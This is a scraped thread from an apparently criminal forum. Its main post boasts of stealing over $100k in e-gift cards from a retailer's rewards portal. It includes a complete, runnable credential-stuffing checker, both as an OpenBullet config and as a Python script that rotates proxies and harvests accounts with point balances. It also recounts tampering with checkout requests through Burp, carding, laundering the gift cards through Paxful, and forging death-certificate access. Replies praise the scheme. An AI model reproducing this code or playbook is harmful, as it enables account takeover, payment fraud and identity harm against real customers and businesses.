Статья How I exploited this corporation for $100k in 7 days

[alsorna]

Nice article, perfect execution

 

[tmaiconcff]

Hi, I don't judge people on their registration dates because there are plenty of clowns and idiots who registered long ago lol. I have always tried to learn anything I can that makes me less dependent on others so that my projects do not require a partner. Partners in my opinion or group projects almost always have a person who is a weak link, or a liar/time waster. It didn't use to be this way but now it is. So I learn things like:

How to make my own scans with machine readable PDF417 barcodes ( Identity verifications for bank drops, various websites, android/ios apps https://github.com/transgen/Transgen )
How to make my own checkers ( Python is your friend I'm sure most would agree, also OB framework is newbie friendly and great to test if no experience https://github.com/openbullet/openbullet )
How to use a web proxy server that sits between your browser and target to intercept/modify traffic ( I use burp suite but there is also fiddler, mitmproxy ,etc https://github.com/SNGWN/Burp-Suite )
How to perform proper and fast recon ( Axiom is my current favorite framework because it allows true distributed scans of many tools easily making it VERY fast https://github.com/pry0cc/axiom )
How to check apk's for keys, vulns, dis etc ( https://github.com/MobSF/Mobile-Security-Framework-MobSF )

Those are my main daily tools/tasks I use. If I have a problem or something I don't know then I break the problem the down and look up the solutions until I understand. This usually involves many failures before success and understanding. I do post on forums asking people for solutions, and I never answer posts I see even if I know the answer. This used to be a sin on old forums and you were expected to exhaust the research on your own so it has stuck with me. Also there is no sense in helping someone learn something that I know can be searched for the answer because at the next road block they will simply quit and beg for answers again in an endless cycle.

I don't have a specific OS, all my vps are usually ubuntu, sometimes I use kali/parrot if I had vm open for specific reason and also windows 10 /server 2019.

I use an android emulator very often, lately its been Nox but I switch it up sometimes genymotion, android studio etc.

Sometimes I will find different things to practice on that most people arent doing. Especially verifications that are unique. Here is one I did last year for the electronic death registration system in Tennessee as a Doctor:


Посмотреть вложение 25784



This allowed me to lookup and create new death certificates. Essentially I couldve electronically killed anyone in the USA lol. I actually still think things along these lines are interesting and would make a very interesting service perhaps. Because of USA laws and the way social security numbers work when someone is killed it is almost impossible to simply correct the mistake if they are found living or that it was a mistake. It also would potentially create possible loopholes when it comes to any legal troubles that person was facing making things like warrants more difficult to enforce, debts, etc. There is also a system for creating birth certificates and certifying them which would potentially allow you to simply create people out of thin air that are in the system. I got the idea originally from an Australian hacker.

You're a genius. Thanks for the article. After such a story, I only want to develop and learn!

 

[0peratorSuiss3]

Fascinating reads. Thank you for sharing!

 

[fectrorem]

This article covers real ecommerce targets I exploited and how I bypassed their developers patches multiple times to continue my project


I apologize in advance for anyone having problems with English. I normally use a translator for private/business communications but since English is permitted here
and there are some details in this article that I do not trust to be translated correctly I will provide this in English. My attempt to translate would only insult
the language.


Please understand I am self taught in everything that I do and every field I pursue. I learn from Russian/German/English/Chinese forums and videos which I translate
as needed. I usually end up using a combination of everything that works for me, borrowing from many cultures and many techniques. I do not claim that my way is the best
or most efficient way and there are always ways to do things more efficiently. What I can show you is what I know and can prove actually works and what I
still actively do that works right now today and is not some outdated repost somebody stole. If you have advice on something you see and how to improve then consider
openly discussing your opinion in an adult manner with respect rather than make fake claims or live on assumptions because your world is so small.

Today I would like to share a project I developed at the end of last year with you. Anyone can follow along and I am happy to answer questions.

There are a lot of legitimate blogs, forums, and different websites I monitor daily to get inspired and find potential targets. One of these blogs is

??????????????.???

This post from that blog caught my eye last year (Click Me)

The reason it got my attention is because in the past I have worked with ????? and ????? points balances and I know the company very well. Many people know that ????? and ?????
are both owned by the same company transformco, and that you if you register at one website you can use the same credentials at the other and they work. But still many
people did not know that those login credentials will also work at a third website owned by transformco which is a rewards portal called ???????????.

??????????? itself has never been impressive, and ?????/????? cashout options using points had gotten worse and worse until eventually you could only use the balances for
crap nobody wanted. But that post above was telling everyone that ?????.??? would be partnering with ???????????.??? and that soon people would be able to cashout
their points for e-gift cards to hundreds of retailers. One user posted that they were currently running a pilot (trial) program and only certain targeted users would get an
email to come try it and report back any issues they experienced. Since I had worked with ?????/????? accounts before I had many thousands of old, spent accounts so I opened
their emails and started searching to see if any of them got a trial invite from ??????????? to try to the new giftcard exchange and I did!
Посмотреть вложение 24806


I followed the link to ???????????.???/????????? logged in and saw the promotional $10 credit. I chose a gift card and checked out where it let me choose
to send to my own email or input someone elses to send the egift as a present. After checking out I instantly had to egift in my email.

Посмотреть вложение 24809

At this point in the story I couldve never guessed where this would lead. So lets analyze where my head is at during this point.

1. There is a program being tested that a very small amount of people are invited to try and you are only allowed to convert the promo $10 balance they put in your account.
2. Even though one of my accounts got an invite and the system works there is never a guarantee it even goes live, or even if it does nobody knows when it will.
3. I always have multiple projects going and I'm more concerned with what is paying now.

I decide this project is not exciting to me at the moment but that I would still gather accounts with balances for another time. I used Openbullet 1.2.2 and also a python standalone to crack accounts.
This is outdated now and will no longer work but it might help someone to get an idea. These would email:pass combos and save accounts with $20+ balances into hits.txt. First is the OB config loli script, second is the standalone python and req's:

FUNCTION RandomString "?d?d?d" -> VAR "3"

FUNCTION GetRandomUA -> VAR "UA"

REQUEST GET "https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1<3>"
 
  SECPROTO TLS11
  HEADER "Host: sso.shld.net"
  HEADER "Connection: keep-alive"
  HEADER "Upgrade-Insecure-Requests: 1"
  HEADER "User-Agent: <UA>"
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
  HEADER "Sec-Fetch-Site: none"
  HEADER "Sec-Fetch-Mode: navigate"
  HEADER "Sec-Fetch-User: ?1"
  HEADER "Sec-Fetch-Dest: document"
  HEADER "Accept-Encoding: gzip, deflate, br"
  HEADER "Accept-Language: en-US,en;q=0.9"

REQUEST POST "https://sso.shld.net/shccas/usr/loginhandler.htm"
  CONTENT "loginId=<USER>&logonPassword=<PASS>&sourceSiteId=4&service=https%3A%2F%2Fwww.kmart.com%2FUSRLogon%3FstoreId%3D10151%26catalogId%3D10104%26langId%3D-1&redirectUrl=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&modifyservice=true&sywLogin=true&shcKey=undefined&shcResponse=0000&tncmodal=false&clienthost=www.kmart.com&renew=true&sywmax=&irp=true"
  CONTENTTYPE "application/x-www-form-urlencoded"
  SECPROTO TLS11
  HEADER "User-Agent: <UA>"
  HEADER "Pragma: no-cache"
  HEADER "Accept: text/html, */*; q=0.01"
  HEADER "authority: sso.shld.net"
  HEADER "origin: https://sso.shld.net"
  HEADER "referer: https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1<3>"

KEYCHECK
  KEYCHAIN Success OR
    KEY "name=\""
  KEYCHAIN Failure OR
    KEY "Sorry, we didn't recognize that email and password combination"
    KEY "Sorry, your credentials have expired"
  KEYCHAIN Custom "2FACTOR" OR
    KEY "Sorry, you've made too many login attempts and your account has been locked"

PARSE "<SOURCE>" LR "name=\"serviceURL\" value=\"" "\"/>" -> VAR "URL"

REQUEST GET "<URL>"
 
  HEADER "User-Agent: <UA>"
  HEADER "Pragma: no-cache"
  HEADER "Accept: text/html, */*; q=0.01"
  HEADER "authority: sso.shld.net"
  HEADER "origin: https://sso.shld.net"
  HEADER "referer: https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1<3>"

REQUEST GET "https://www.kmart.com/universalprofile/customerinfo"
 
  SECPROTO TLS12
  HEADER "dnt: 1"
  HEADER "referer: https://www.kmart.com/?storeId=10151&catalogId=10104"
  HEADER "sec-fetch-dest: empty"
  HEADER "sec-fetch-mode: cors"
  HEADER "sec-fetch-site: same-origin"
  HEADER "user-agent: <UA>"
  HEADER "x-requested-with: XMLHttpRequest"

PARSE "<COOKIES(cust_info)>" LR "" "" -> VAR "Points"

FUNCTION URLDecode "<Points>" -> VAR "Points"

PARSE "<Points>" JSON "pointsDollar" CreateEmpty=FALSE -> CAP "Dollars"

KEYCHECK BanOnToCheck=FALSE
  KEYCHAIN Custom "CUSTOM" OR
    KEY "<Dollars>" LessThan "20"
    KEY "<Dollars>" DoesNotExist

This is the python script and reqs.

import random
from easygui import fileopenbox
from concurrent.futures import ThreadPoolExecutor
from multiprocessing.dummy import Pool
import time
from time import sleep
import re
from threading import Thread, Lock
from os import system
import os
import string
from subprocess import check_output
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from urllib.parse import unquote
import json
import sys

clear = lambda: os.system('cls')
system('title '+ 'KMART - Checking [0/0] - Hits: 0 - Bad: 0 - CPM: 0')


BLUE = '\33[94m'
LightBlue = '\033[94m'
RED = '\033[91m'
WHITE = '\33[97m'
YELLOW = '\33[93m'
GREEN = '\033[32m'
Magenta  = "\033[35m"
LightCyan    = "\033[96m"
END = '\033[0m'

if len(sys.argv) < 2:
    sys.stdout.write(RED + """

                                    ██╗  ██╗     ███╗   ███╗ █████╗ ██████╗ ████████╗
                                    ██║ ██╔╝     ████╗ ████║██╔══██╗██╔══██╗╚══██╔══╝
                                    █████╔╝█████╗██╔████╔██║███████║██████╔╝   ██║ 
                                    ██╔═██╗╚════╝██║╚██╔╝██║██╔══██║██╔══██╗   ██║ 
                                    ██║  ██╗     ██║ ╚═╝ ██║██║  ██║██║  ██║   ██║ 
                                    ╚═╝  ╚═╝     ╚═╝     ╚═╝╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝ 
                                                      

    \n""")
input(YELLOW+"[+] "+RED+"Press Any Key To Start.......")

threads = input(YELLOW+"[+] "+RED+"Threads: ")
pchoice = int(input(YELLOW+"[+] "+RED+"(1. HTTP|2. SOCKS4| 3.SOCKS5): "))
if pchoice == 1:
    proxytype = 'http'
elif pchoice == 2:
    proxytype = 'socks4'
elif pchoice == 3:
    proxytype = 'socks5'
else:
    proxytype = 'http'

stopstuff = True
comboloader = []
proxyloaderloader = []
combolist = []
proxylist = []

software_names = [SoftwareName.CHROME.value]
operating_systems = [OperatingSystem.WINDOWS.value, OperatingSystem.LINUX.value] 

class Counter:
    checked = 0
    hits = 0
    bad = 0
    cpm = 0

comboloader = open(fileopenbox(title="Load Combo List", default="*.txt"), 'r', encoding="utf8",
                                      errors='ignore').read().split('\n')

combolist = [x.strip() for x in comboloader if ":" in x and x != '']

proxyloader = open(fileopenbox(title="Load Proxy List", default="*.txt"), 'r', encoding="utf8",
                                      errors='ignore').read().split('\n')

proxylist = [x.strip() for x in proxyloader if ":" in x and x != '']

print(f"{YELLOW}[+] {RED}{len(combolist)} Combos Loaded")
print(f"{YELLOW}[+] {RED}{len(proxylist)} Proxies Loaded")
print(YELLOW+"[+] "+RED+"Starting Engine......\n\n\n")

def getua():
    user_agent_rotator = UserAgent(software_names=software_names, operating_systems=operating_systems, limit=1000)
    user_agent = user_agent_rotator.get_random_user_agent()
    return user_agent



def checkmc(line):
    while True:
        if ':' in line:
            email, password = line.split(':', 1)
            currentproxy = random.choice(proxylist)
            if currentproxy.count(':') == 3:
                spl = currentproxy.split(':')
                currentproxy = f'{spl[2]}:{spl[3]}@{spl[0]}:{spl[1]}'
            else:
                currentproxy = currentproxy

            if proxytype in ['https', 'http']:
                proxy_form = {'http': f"http://{currentproxy}", 'https': f"https://{currentproxy}"}
            elif proxytype in ['socks4', 'socks5']:
                pline = f"{proxytype}://{currentproxy}"
                proxy_form = {'http': pline, 'https': pline}


            session = requests.sessions.Session()
            session.proxies = proxy_form

            try:

                three = "".join(random.choices(string.digits, k=3))

                UA = getua()

                page1 = f'https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1{three}'
                h1 = {"User-Agent": f"{UA}", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate, br", "Accept-Language": "en-US,en;q=0.9"}
                h1.update({'Content-Type': 'application/x-www-form-urlencoded'})

                session.get(page1, headers=h1, timeout=4)


                page2 = f'https://sso.shld.net/shccas/usr/loginhandler.htm'
                h2 = {"User-Agent": f"{UA}", "Accept": "text/html, */*; q=0.01", "authority": "sso.shld.net", "origin": "https://sso.shld.net", "referer": f"https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1{three}"}
                h2.update({'Content-Type': 'application/x-www-form-urlencoded'})
                data2 = f'loginId={email}&logonPassword={password}&sourceSiteId=4&service=https%3A%2F%2Fwww.kmart.com%2FUSRLogon%3FstoreId%3D10151%26catalogId%3D10104%26langId%3D-1&redirectUrl=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&modifyservice=true&sywLogin=true&shcKey=undefined&shcResponse=0000&tncmodal=false&clienthost=www.kmart.com&renew=true&sywmax=&irp=true'

                r2 = session.post(page2, data=data2, headers=h2, timeout=4).text




                if 'Sorry, we didn\'t recognize that email and password combination' in r2:
                    Counter.bad += 1
                    Counter.checked += 1
                    session.close()
                    break
                elif 'Sorry, your credentials have expired' in r2:
                    Counter.bad += 1
                    Counter.checked += 1
                    session.close()
                    break
                elif 'Sorry, you\'ve made too many login attempts and your account has been locked' in r2:
                    Counter.bad += 1
                    Counter.checked += 1
                    session.close()
                    break
                elif 'name="' in r2:

                    URL = re.search('name="serviceURL" value="(.*?)"', r2).group(1)
                    h3 = {"User-Agent": f"{UA}", "Accept": "text/html, */*; q=0.01", "authority": "sso.shld.net", "origin": "https://sso.shld.net", "referer": f"https://sso.shld.net/shccas/usr/regEnroll.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&target=https%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&modifyservice=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default7441&xdm_p=1{three}"}
                    h3.update({'Content-Type': 'application/x-www-form-urlencoded'})
                    session.get(URL, headers=h3, timeout=4)


                    h4 = {"dnt": "1", "referer": "https://www.kmart.com/?storeId=10151&catalogId=10104", "sec-fetch-dest": "empty", "sec-fetch-mode": "cors", "sec-fetch-site": "same-origin", "user-agent": f"{UA}", "x-requested-with": "XMLHttpRequest", 'Content-Type': 'application/x-www-form-urlencoded'}
                    r4 = session.get('https://www.kmart.com/universalprofile/customerinfo', headers=h4, timeout=4)

                    cook = str(r4.headers)

                    points = re.search('cust_info=(.*?);', cook).group(1)

                    punencoded = requests.utils.unquote(points)

                    dollars = re.search('pointsDollar":(.*?),', punencoded).group(1)


                    if float(dollars) < 20.0:
                        with open('custom.txt', 'a', encoding='utf8') as ps:
                            ps.write(f"{line} | Dollars: {dollars}\n")
                    else:
                        with open('hits.txt', 'a', encoding='utf8') as ps:
                            ps.write(f"{line} | Dollars: ${dollars}\n")


                    Counter.hits += 1
                    Counter.checked += 1
                    mylock.acquire()
                    print(f'{YELLOW}[+] {Magenta}~ {GREEN}{line} | Dollars: {GREEN}${dollars}')
                    mylock.release()
                    session.close()
                    break
                else:
                    session.close()
                    continue
            except:
                session.close()
                continue
        else:
            Counter.bad += 1
            Counter.checked += 1
            break

def title():
    while True:
        system('title '+ f'KMART - Checking [{Counter.checked}/{len(combolist)}] - Hits: {Counter.hits} - Bad: {Counter.bad} - CPM: {Counter.cpm}')


def cpm_counter():
        while True:
            if Counter.checked >= 1:
                now = Counter.checked
                sleep(3)
                Counter.cpm = (Counter.checked - now) * 20

Thread(target=cpm_counter, daemon=True).start()
mylock = Lock()
Thread(target=title).start()
mainpool = Pool(processes=int(threads))
mainpool.imap_unordered(func=checkmc, iterable=combolist)
mainpool.close()
mainpool.join()
stopstuff = False

print("Done Checking.........")
input()

I collect many many accounts automatically for quite a while until I store them and forget about them.... Until one day I notice an update on the blog above I mentioned. Someone had posted to inform others that the giftcard exchange program had gone live and now all ??????????? customers could exchange their point balances for gift cards.

I immediately broke out of my stashed accounts and started cashing them out one by one and since they allowed you to input another email at the checkout page if you wanted to send it as a gift so I chose that since I didnt have email access to these accounts and wouldnt be able to retrieve the gift cards if they were sent only to there. Unfortunately this didnt last before they had to make some changes. One day I tried to begin cashing out again and found they had patched the checkout page so that you did not have the ability to send as a gift or alter the email address field. I tried going to the profile page on the account to change the email address there but they had already closed that possibility. Then I remembered these credentials work on ????? and ????? too so first I tried ????? but they had disabled it, and then I tried ????? which they had not fixed!

So I set about my project again cashing out but also adding an extra step now =( This lasted 1 day before they fixed that also. I was thinking of moving on until I decided to try and intercept the traffic at checkout, modify the email address being posted in the request and forwarding it to see if it would allow it. And it did!

Посмотреть вложение 24808

At this point they had also introduced a new feature during checkout. Not only could you use your points to get giftcards but they now put in a payment processor so you could use your credit card to pay for your gift card if the total was more than your point balance. After some quick testing I quickly realized balances on the accounts would no longer be necessary......

Посмотреть вложение 24811Посмотреть вложение 24812



At this point I understood the payment processor had little to no fraud security, I didn't even need to use different accounts. I could just one on account and keep purchasing egift cards, intercepting the traffic ith burp and changing email to any email, and it would be delivered there. then when cvv being used was empty I could simply use the next one on the same account and keep pushing out e gift cards to any email from one single account over and over.

Посмотреть вложение 24814Посмотреть вложение 24815





I got tens of thousands of dollars $100k+ in Sephora, Walmart, Razer, Saks 5th avenue, Autozone, Nike, and so many more instantly delivered. What was a little side project to cashout some accounts with balances turned into me essentially being able to issue unlimited e gifts from 100s of different retailers from one one portal.

I instantly converted them all to bitcoin through paxful with the chinese who are very happy to find reliable bulk supplier and pay 80%+

Посмотреть вложение 24816



Посмотреть вложение 24817

Ive never written anything like this so hope its acceptable and hope someone gets an idea that helps them with their projects.

интересная статья, жаль что на английском, всё таки у нас тут основная аудитория ру

 

[waggfagg]

very good article, my respect?

 

[drp4r71cl3]

nice and interesting story, where did you sell your gift cards ?

 

[valhalla]

Best post in a decade!

 

[decibek]

This guys is a full of deceptions .. i should open Black! He Asked for a Drop.. I Provided. After fucking up he disappears. Comes back to delete logs after 2 weeks. Suspicious Behaviour if you ask me!

 

[decibek]

Bullshit post from Shit Ripper!

 

[DeSnake]

nice and interesting story, where did you sell your gift cards ?

He mentioned paxful on his post.

Good post.

Thank you.

 

[ghostmarket09]

He mentioned paxful on his post.

Good post.

Thank you.

 

[DeSnake]

Посмотреть вложение 27063

Just because people have some sort of business going on with substances that does not equal to them being a cop. Paranoia is a good trait to have but character misjudgement calls smears all of that. For the years you have been around you should have developed a better sense or better yet, get this, do your own research before you make bold claims.

As I told you previous wait and see AlphaBay grow & innovate as we always have been. Once we have the decentralized market project running that should prove to you and others who doubt we are for real, in the mean time we will make our money and you can keep popping $20 giftcard stores. I liked the topic and how it was approached is all I came to say, for the rest give it time.

Thank you.

 

[ghostmarket09]

Just because people have some sort of business going on with substances that does not equal to them being a cop. Paranoia is a good trait to have but character misjudgement calls smears all of that. For the years you have been around you should have developed a better sense or better yet, get this, do your own research before you make bold claims.

As I told you previous wait and see AlphaBay grow & innovate as we always have been. Once we have the decentralized market project running that should prove to you and others who doubt we are for real, in the mean time we will make our money and you can keep popping $20 giftcard stores. I liked the topic and how it was approached is all I came to say, for the rest give it time.

Thank you.

Sure thing, you and the boys keep pretending some new market will be some kind of proof of something and hoping lazy misdirection attempts will get the job done. You're all wrong about me though, I welcome you guys and your little project because if you haven't been able to tell lately the low hanging fruit is becoming an issue and growing out of control. I happily welcome a nice big harvest. Hope to see nice big adverts from you boys on every board I hang around.

Thank you.

 

[jewishscientist1]

wow. this is exactly what I was thinking couple of days ago and I come here to read it )))

I can very well relate to your post. I think one thing is for sure, everything has several meanings, some meanings are aparent and for the general public to know and some other hidden meanings that are only accessible to people who are willing to spend sometime actually observing things and trying to read other meaning out of the. I believe everything in the Universe/world is exploitable if you really think deeply about it. I am quite inspired. it is so true that you attract what you put out into the Universe. I am amazed that of so many hears i have just now coming accross something like this after having just decided to stard doing some deep thinking on my own. Wow. I am absolutely inspired by you guys. Thanks men!!!

 

[krakenum123]

I learn from Russian/German/English/Chinese forums

есть идеи, о каких форумах он говорит?

 

[vx4]

bx1 было чем-то другим